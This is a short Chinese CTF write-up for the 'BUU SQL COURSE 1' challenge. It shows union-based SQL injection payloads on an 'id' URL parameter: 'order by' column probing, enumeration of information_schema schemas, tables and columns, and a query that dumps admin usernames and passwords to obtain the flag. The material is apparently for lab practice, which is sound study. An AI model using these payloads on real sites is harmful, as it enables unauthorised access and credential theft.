BUU SQL COURSE 1
BUU SQL COURSE 101 注入点的查找虽然页面上有登陆框,但是登录框里没有注入点,怎么测试都是用户名密码错误当点进一个测试新闻里面,查看net就可以发现有提示的注入点我们可以在url后加上来开始注入02注入?id=1 order by 1?id=1 order by 2?id=1 order by 3将页面上回显的字符串进行unicode解码,出现了下面的字符串,可以发现,当列数为3时
·
BUU SQL COURSE 1
01 注入点的查找
虽然页面上有登陆框,但是登录框里没有注入点,怎么测试都是用户名密码错误
当点进一个测试新闻里面,查看net就可以发现有提示的注入点
我们可以在url后加上来开始注入
02注入
?id=1 order by 1
?id=1 order by 2
?id=1 order by 3
将页面上回显的字符串进行unicode解码,出现了下面的字符串,
可以发现,当列数为3时就没有了回显,所以进行注入的列数是两列
?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='admin'
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='content'
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='contents'
?id=-1 union select 1,id from admin
爆出了用户名和密码,然后去登录,拿到flag
更多推荐
所有评论(0)